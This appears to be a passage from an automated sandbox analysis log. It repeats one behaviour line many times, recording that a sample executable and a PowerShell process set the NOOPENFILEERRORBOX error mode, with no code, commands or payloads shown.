                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\LisectAVT_2403002A_16.exeProcess information set: NOOPENFILEERRORBOX
